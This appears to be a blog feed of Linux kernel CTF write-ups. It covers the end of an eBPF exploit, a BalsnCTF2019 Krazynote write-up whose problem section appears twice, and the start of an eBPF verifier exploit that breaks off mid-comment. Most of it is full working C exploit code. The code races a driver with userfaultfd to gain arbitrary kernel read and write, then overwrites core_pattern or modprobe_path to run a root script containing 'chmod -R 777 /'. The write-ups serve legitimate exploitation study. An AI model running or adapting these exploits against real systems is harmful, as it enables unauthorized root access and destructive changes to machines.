} char modprobe[0x100]; read(fd, modprobe, sizeof(modprobe)); if (strncmp(modprobe, new_modprobe, new_modprobe_len)) { printf(&#34;[*] new modprobe: %s\n&#34;, modprobe); puts(&#34;[-] Failed to overwrite modprobe&#34;); return -1; } puts(&#34;[+] Successfully overwritten modprobe&#34;); } puts(&#34;[+] Get root&#34;); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;); close(mapfd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf</a></li> </ul> /posts/kernel/write-ups/ctf/balsnctf2019-krazynote/ Fri, 24 Jan 2025 06:56:49 +0000 /posts/kernel/write-ups/ctf/balsnctf2019-krazynote/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.1.9</code></li> </ul> <h3 id="features">Features</h3> <p>This challenge provide <code>note</code> misc device with which we can save(0xffffff00) and get(0xffffff02), update(0xffffff01) data using unlocked_ioctl. When we save and get, update data on it, the xor-encrypted data is stored.</p> <p>And the struct enc_data (stored data) and struct request_t is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">request_t</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">enc_data_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> xor_key; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data_addr_minus_page_offset_base; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> enc_data[<span style="color:#ae81ff">0</span>]; <span style="color:#75715e">// Struct Hack; see https://www.geeksforgeeks.org/struct-hack/ </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>} <span style="color:#66d9ef">enc_data_t</span>; </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>Since <code>unlocked_ioctl</code> does not perform blocked-ioctl and the device does not use mutex, we can do race condition attack easily. Furthermore in given kernel environment, non-privileged userfaultfd is allowed.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.1.9</code></li> </ul> <h3 id="features">Features</h3> <p>This challenge provide <code>note</code> misc device with which we can save(0xffffff00) and get(0xffffff02), update(0xffffff01) data using unlocked_ioctl. When we save and get, update data on it, the xor-encrypted data is stored.</p> <p>And the struct enc_data (stored data) and struct request_t is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">request_t</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">enc_data_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> xor_key; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data_addr_minus_page_offset_base; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> enc_data[<span style="color:#ae81ff">0</span>]; <span style="color:#75715e">// Struct Hack; see https://www.geeksforgeeks.org/struct-hack/ </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>} <span style="color:#66d9ef">enc_data_t</span>; </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>Since <code>unlocked_ioctl</code> does not perform blocked-ioctl and the device does not use mutex, we can do race condition attack easily. Furthermore in given kernel environment, non-privileged userfaultfd is allowed.</p> <p>Consider following sequence:</p> <pre class="mermaid"> sequenceDiagram participant user participant device participant userfaultfd user-&gt;&gt;device: store_data(idx &lt;- 0) note over device: [0x00] enc_data(key=?,len=0x10,data=0x18) @ idx=0 device-&gt;&gt;userfaultfd: request: copy_from_user userfaultfd-&gt;&gt;device: request: reset note over device: [0x00] NULL userfaultfd-&gt;&gt;device: request: store_data(idx &lt;- 0) note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0 userfaultfd-&gt;&gt;device: request: store_data(idx &lt;- 1) note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0 note over device: [0x18] enc_data(key=?,len=0,data=0x30) @ idx=1 userfaultfd-&gt;&gt;device: response: data of copy_from_user = {0x11111111, 0x22222222, 0x33333333} note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0 note over device: [0x18] enc_data(key=0x11111111,len=0x22222222,data=0x33333333) @ idx=1 user-&gt;&gt;device: get_data(idx=1) </pre> <p>As see above, we can control xor_key and size, data_addr_minus_page_offset_base of enc_data_t. Then we can leak xor_key(<code>leak_xor_key</code>) and data_addr_minus_page_offset_base(<code>leak_vuln_dev_minus_page_offset_base</code>), device(module)_base(<code>leak_vuln_dev_base</code>), page_offset_base(<code>vuln_dev_base - vuln_dev_base_minus_page_offset_base</code>), kernel_base(<code>leak_kernel_base</code>) step by step.</p> <p>As the device provide read and update features, we can make AAR &amp; AAW primitives using these features on modified enc_data.</p> <h2 id="exploit">Exploit</h2> <div class="collapsable-code"> <input id="325471986" type="checkbox" checked /> <label for="325471986"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">BalsnCTF2019-Krazynote-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_NAME &#34;note&#34; #define VULN_DEV_CMD_ADD 0xffffff00 #define VULN_DEV_CMD_UPDATE 0xffffff01 #define VULN_DEV_CMD_GET 0xffffff02 #define VULN_DEV_CMD_RESET 0xffffff03 #define VULN_DEV_BASE 0xffffffffc0000000 #define VULN_DEV_MISC_FILE_OPS_OFFSET (0xffffffffc0002060 - VULN_DEV_BASE) #define VULN_DEV_MISC_FILE_OPS_UNLOCKED_IOCTL_IDX 10 #define VULN_DEV_MISC_FILE_OPS_FLUSH_IDX 14 #define VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE \ (0xffffffffc00021f8 - VULN_DEV_BASE) #define KERNEL_BASE 0xffffffff81000000 #define OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV \ (0xffffffff810a8fa0 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff8210dbe0 - KERNEL_BASE) static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); if (uffd &lt; 0) { fatal(&#34;syscall(__NR_userfaultfd)&#34;); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } cpu_set_t target_cpu; static int vuln_dev_fd; uint64_t vuln_dev_xor_key; uint64_t vuln_dev_base_minus_page_offset_base; uint64_t vuln_dev_base; uint64_t page_offset_base; uint64_t kernel_base; typedef struct request_t { uint64_t idx; uint64_t size; uint64_t data; } request_t; static int vuln_dev_add(uint8_t size, void* data) { request_t req = { .idx = 0, .size = size, .data = (uint64_t)data, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_ADD, &amp;req); } static int vuln_dev_update(uint64_t idx, void* buf) { request_t req = { .idx = idx, .size = 0, .data = (uint64_t)buf, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_UPDATE, &amp;req); } static int vuln_dev_get(uint64_t idx, void* buf) { request_t req = { .idx = idx, .size = 0, .data = (uint64_t)buf, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &amp;req); } static int vuln_dev_reset() { request_t req = { .idx = 0, .size = 0, .data = 0, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_RESET, &amp;req); } // funtions for leaking xor_key int leaked_xor_key_bytes = 0; static void* userfault_handler_for_leak_xor_key(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(leaked_xor_key_bytes, page); vuln_dev_add(0xff, page); copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static uint64_t leak_xor_key() { char buf[0x100] = { 0, }; uint64_t tmp_xor_key = 0; for (int i = 0; i &lt; 8; ++i) { void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_leak_xor_key); vuln_dev_add(0x10, uffd_page); memset(buf, &#39;a&#39;, sizeof(buf)); vuln_dev_get(1, buf); int idx_61 = -1; for (int i = 0; i &lt; 0x100; ++i) { if (buf[i] == 0x61 &amp;&amp; idx_61 == -1) { idx_61 = i; } } if (idx_61 == -1) { fatal(&#34;leak_xor_key: idx_61 == -1&#34;); } tmp_xor_key |= ((uint64_t)idx_61) &lt;&lt; (i * 8); vuln_dev_reset(); munmap(uffd_page, 0x1000); ++leaked_xor_key_bytes; } return tmp_xor_key; } // funtions for leaking vuln_dev_base - page_offset_base static void* userfault_handler_for_vuln_dev_base_minus_page_offset_base( void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 8) = 0x18 ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static uint64_t leak_vuln_dev_minus_page_offset_base() { char buf[0x100] = { 0, }; void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_vuln_dev_base_minus_page_offset_base); vuln_dev_reset(); vuln_dev_add(0x10, uffd_page); vuln_dev_get(1, buf); vuln_dev_reset(); munmap(uffd_page, 0x1000); uint64_t vuln_dev_base_minus_page_offset_base = *(uint64_t*)(buf + 0x10); return vuln_dev_base_minus_page_offset_base - 0x2568; } // functions for leaking vuln_dev_base static void* userfault_handler_for_vuln_dev_base(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 0x08) = 0x18 ^ vuln_dev_xor_key; *(uint64_t*)(page + 0x10) = (vuln_dev_base_minus_page_offset_base + VULN_DEV_MISC_FILE_OPS_OFFSET + 8 * VULN_DEV_MISC_FILE_OPS_FLUSH_IDX) ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static uint64_t leak_vuln_dev_base() { char buf[0x100] = { 0, }; void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_vuln_dev_base); vuln_dev_reset(); vuln_dev_add(0x18, uffd_page); vuln_dev_get(1, buf); vuln_dev_reset(); munmap(uffd_page, 0x1000); uint64_t tmp_vuln_dev_base = *(uint64_t*)(buf); return tmp_vuln_dev_base; } // functions for aar uint64_t aar_addr; size_t aar_size; static void* userfault_handler_for_aar(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 0x08) = aar_size ^ vuln_dev_xor_key; *(uint64_t*)(page + 0x10) = (aar_addr - page_offset_base) ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static void aar(void* out, uint64_t addr, uint64_t size) { if (size &gt;= 0x100) { fatal(&#34;aar: size &gt;= 0x100&#34;); } void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_aar); aar_addr = addr; aar_size = size; vuln_dev_reset(); vuln_dev_add(0x18, uffd_page); vuln_dev_get(1, out); vuln_dev_reset(); munmap(uffd_page, 0x1000); } // functions for aar uint64_t aaw_addr; size_t aaw_size; static void* userfault_handler_for_aaw(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 0x08) = aaw_size ^ vuln_dev_xor_key; *(uint64_t*)(page + 0x10) = (aaw_addr - page_offset_base) ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static void aaw(uint64_t addr, void* data, uint64_t size) { if (size &gt;= 0x100) { fatal(&#34;aar: size &gt;= 0x100&#34;); } void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_aaw); aaw_addr = addr; aaw_size = size; vuln_dev_reset(); vuln_dev_add(0x18, uffd_page); vuln_dev_update(1, data); vuln_dev_reset(); munmap(uffd_page, 0x1000); } static uint64_t leak_kernel_base() { uint64_t val; aar(&amp;val, vuln_dev_base + VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE, 8); aar(&amp;val, val, 8); return val - OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV; } // end of helper functions static int overwrite_core_pattern(const char* new_core_pattern, size_t len) { aaw(kernel_base + CORE_PATTERN_OFFSET, (void*)new_core_pattern, len); int fd = open(&#34;/proc/sys/kernel/core_pattern&#34;, O_RDONLY); char buf[0x100] = { 0, }; read(fd, buf, 0x100); close(fd); if (strncmp(buf, new_core_pattern, len) != 0) { return -1; } return 0; } int main() { CPU_ZERO(&amp;target_cpu); CPU_SET(0, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEV_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open(/dev/&#34; VULN_DEV_NAME &#34;)&#34;); } vuln_dev_xor_key = leak_xor_key(); printf(&#34;[+] xor_key: 0x%lx\n&#34;, vuln_dev_xor_key); vuln_dev_base_minus_page_offset_base = leak_vuln_dev_minus_page_offset_base(); printf(&#34;[+] vuln_dev_base_minus_page_offset_base: 0x%lx\n&#34;, vuln_dev_base_minus_page_offset_base); vuln_dev_base = leak_vuln_dev_base(); printf(&#34;[+] vuln_dev_base: 0x%lx\n&#34;, vuln_dev_base); page_offset_base = vuln_dev_base - vuln_dev_base_minus_page_offset_base; printf(&#34;[+] page_offset_base: 0x%lx\n&#34;, page_offset_base); kernel_base = leak_kernel_base(); printf(&#34;[+] kernel_base: 0x%lx\n&#34;, kernel_base); puts(&#34;[*] prepare for core_pattern&#34;); const char* new_core_pattern = &#34;|//home/note/evil.sh&#34;; const size_t new_core_pattern_len = strlen(new_core_pattern); printf(&#34;[*] overwriting core_pattern to \&#34;%s\&#34;...\n&#34;, new_core_pattern); if (overwrite_core_pattern(new_core_pattern, new_core_pattern_len) &lt; 0) { fatal(&#34;overwrite_core_pattern&#34;); } puts(&#34;[*] make //home/note/evil.sh...&#34;); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; //home/note/evil.sh&#34;); system(&#34;chmod +x //home/note/evil.sh&#34;); system(&#34;ulimit -c unlimited&#34;); uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe; close(vuln_dev_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://github.com/smallkirby/pwn-writeups/tree/master/balsn2019/krazynote/original">https://github.com/smallkirby/pwn-writeups/tree/master/balsn2019/krazynote/original</a></li> </ul> /posts/kernel/pawnyable/pawnyable_lk06/ Wed, 22 Jan 2025 12:31:57 +0000 /posts/kernel/pawnyable/pawnyable_lk06/ <hr> <h2 id="lk06-brahman">LK06: Brahman</h2> <h3 id="exploit-using-adjust_ptr_min_max_vals">Exploit using adjust_ptr_min_max_vals</h3> <div class="collapsable-code"> <input id="149628537" type="checkbox" checked /> <label for="149628537"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd = -1; uint64_t leak_bpf_map_addr() { char verifier_log[0x10000]; uint64_t val = 0; bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if 